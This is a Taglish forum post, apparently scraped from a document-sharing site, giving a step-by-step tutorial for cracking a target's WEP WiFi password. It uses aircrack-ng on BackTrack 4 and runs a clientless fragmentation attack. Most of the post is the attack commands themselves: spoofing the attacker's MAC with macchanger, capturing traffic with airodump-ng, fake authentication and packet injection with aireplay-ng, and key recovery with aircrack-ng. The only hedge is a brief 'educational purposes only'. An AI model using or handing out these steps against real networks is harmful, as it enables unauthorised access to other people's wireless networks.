Sie sind auf Seite 1von 7

ok mga boss para sa starter

cracking wep password using fragmentation attack (clientless


mode)
Eto gamit ko kasi kahit walang gumagamit ng wifi kayang kaya mo pa din ma-crack ang wep password at
mas mabilis ang pag ipon ng #data para magamit sa aircrack-ng ( para sa akin mas mabilis to

Note: sabi nga nila this is for educational purposes only..


Tools:
> backtrack 4 final > download page ( http://www.backtrack-linux.org/downloads/ )
> usb wifi adapter na compatible sa aircrack ( http://www.aircrack-ng.org/doku.php?
id=compatibility_drivers )
>
>
>
>
>

BSSID ( 9a:f3:w0:33:44:r4 ) = mac address ng target nyo


ATTACKER ( 00:11:22:33:44:55 ) = mac address natin
ESSID ( habagat ) = essid ng target
CH ( 1 ) = channel kung nasan ang target
wlan0 = interface natin

Eto ang step by step:


> sa backtrack 4 open kayo ng terminal. ( sa bottom left side ito ng screen nyo makikita katabi
ng logo ng firefox yung kulay itim )
> tapos i-open just type this ( without qoute )
> " airmon-ng " ( para makita natin ang interface natin ) tapos
> " airmon-ng stop wlan0 " ( wlan0 interface ko )
> " ifconfig wlan0 down "
> " macchanger --mac 00:11:22:33:44:55 wlan0 " ( ibig sabihin nito palitan ng fake na mac
address ung tunay na mac address natin )
> " airmon-ng start wlan0 " ( start wlan0 interface )

This image has been resized. Click this bar to view the full image. The original image is sized 1024x600.

image hosting gif


pag nag start na yung interface natin at nasa monitor mode na sya. ang next step ay magdetect
ng wifi sa paligid natin
> " airodump-ng wlan0 " ( wait ng ilang minuto hanggat makakuha sya ng signal ng wifi )
> pag-nakakita ng sya ng wep signal click nyo ctrl+c para huminto na sya.

This image has been resized. Click this bar to view the full image. The original image is sized 1024x600.

image upload
> tapos type nyo to
> airodump-ng -c (CH) --bssid (BSSID) -w (filename) wlan0
ex. airodump-ng -c 1 --bssid 9a:f3:w0:33:44:r4 -w kahit-ano wlan0

This image has been resized. Click this bar to view the full image. The original image is sized 1024x600.

image hosting
> tapos open kayo ng bagong terminal type
> aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h (00:11:22:33:44:55) wlan0 ( para magsend sya ng
authentication sa target )
ex. aireplay-ng -1 0 -e habagat -a 9a:f3:w0:33:44:r4 -h 00:11:22:33:44:55 wlan0
note: kailangan mag association successfull sya :-) <- at me ganyang smiley face na lumabas
bago gawin ang next step

This image has been resized. Click this bar to view the full image. The original image is sized 1024x600.

png image hosting


> tapos open kayo ng bagong terminal type
> aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (BSSID) -h (00:11:22:33:44:55) wlan0
ex. aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 9a:f3:w0:33:44:r4 -h 00:11:22:33:44:55 wlan0
( ito ay para mapabilis ang pagipon natin ng data# para sa aircrack-ng )

This image has been resized. Click this bar to view the full image. The original image is sized 1024x600.

gif image hosting


> pag nakakuha na kayo ng enough data# ( 250,000+ #data ang kailangan )
> open kayo ng bagong terminal tapos type nyo
> aircrack-ng -b 9a:f3:w0:33:44:r4 (filename)*.cap
ex. aircrack-ng -b 9a:f3:w0:33:44:r4 kahit-ano*.cap
( ito ay para macrack ang naipon nating #data )

This image has been resized. Click this bar to view the full image. The original image is sized 1024x600.

upload images

100% working to mga boss.. tested by me > xxradicaalxx <


magpopost ako ng screen shot ng nacrack na IV sa susunod na mga
araw

By: xxradicaalxx

Das könnte Ihnen auch gefallen